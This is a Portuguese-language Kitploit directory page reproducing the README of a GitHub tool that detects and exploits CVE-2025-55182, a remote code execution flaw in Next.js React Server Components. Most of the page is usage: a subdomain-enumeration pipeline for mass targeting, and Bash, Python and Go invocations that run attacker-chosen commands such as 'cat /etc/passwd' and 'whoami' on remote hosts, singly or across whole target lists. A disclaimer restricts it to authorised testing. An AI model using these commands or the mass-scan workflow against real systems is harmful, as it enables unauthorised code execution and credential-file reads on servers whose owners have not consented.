Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Simple-Scanner-main — Scanner multilíngue para CVE-2025-55182 RCE em Componentes de Servidor React do Next.js, com modos de varredura único/em massa e fluxo de trabalho integrado de reconhecimento para bug bounty. | Kitploit
Ferramentas/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoEnumeração de SubdomíniosAprendizado e Educação
GitHubjan0x190/cve-2025-55182-simple-scanner-main

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

CVE-2025-55182-Simple-Scanner-main

Scanner multilíngue para CVE-2025-55182 RCE em Componentes de Servidor React do Next.js, com modos de varredura único/em massa e fluxo de trabalho integrado de reconhecimento para bug bounty.

Ver Repositório
14há 9 mesesAinda não revisado
Compartilhar

CVE-2025-55182: Scanner de RCE para React Server Components

Um kit de ferramentas abrangente para detectar e explorar CVE-2025-55182, uma vulnerabilidade crítica de Execução Remota de Código em aplicações Next.js que utilizam React Server Components.

Este repositório apresenta um scanner Bash unificado (modo Único e em Massa), implementações em Python/Go e um fluxo de trabalho de reconhecimento para bug bounty.

Scanner Menu Scanner Demo


📂 Estrutura do Repositório

  • scanner.sh — Script Bash all-in-one para varredura de Alvo Único e em Massa
  • python/exploit.py — Implementação Python estável (melhor escapamento JSON)
  • go/main.go — Implementação de alto desempenho (compilável)

🚀 Fluxo de Trabalho de Reconhecimento (Metodologia Bug Bounty)

Para caça em massa em domínios curinga, use este pipeline para filtrar alvos antes da varredura:

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Uso do Scanner Bash (Recomendado)

O script scanner.sh suporta varreduras de alvo único e varredura em massa a partir de uma lista de arquivos.

🔧 Instalação

root@kitploit:~
chmod +x scanner.sh

1️⃣ Modo de Alvo Único

Melhor para verificar um alvo específico com saída detalhada.

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Modo de Varredura em Massa

Escaneia eficientemente uma lista de URLs e salva hosts vulneráveis em um arquivo.

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

Opções


🐍 Versão Python

Use esta se você encontrar problemas com o escapamento de caracteres especiais no Bash.

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Versão Go

Alto desempenho, dependências mínimas.

Executar diretamente

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Compilar binário

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado é estritamente ilegal. O desenvolvedor não assume nenhuma responsabilidade por uso indevido ou danos causados por este programa.


🔗 Referências

  • Detalhe CVE da NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Aviso de Segurança React (vulnerabilidade em React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Template Nuclei do ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Baixar ferramenta
FlagDescription
-d, --domainURL de alvo único
-l, --listArquivo contendo lista de URLs
-c, --commandComando a executar (padrão: id)
-o, --outputArquivo de saída para hosts vulneráveis (padrão: vulnerable_hosts.txt)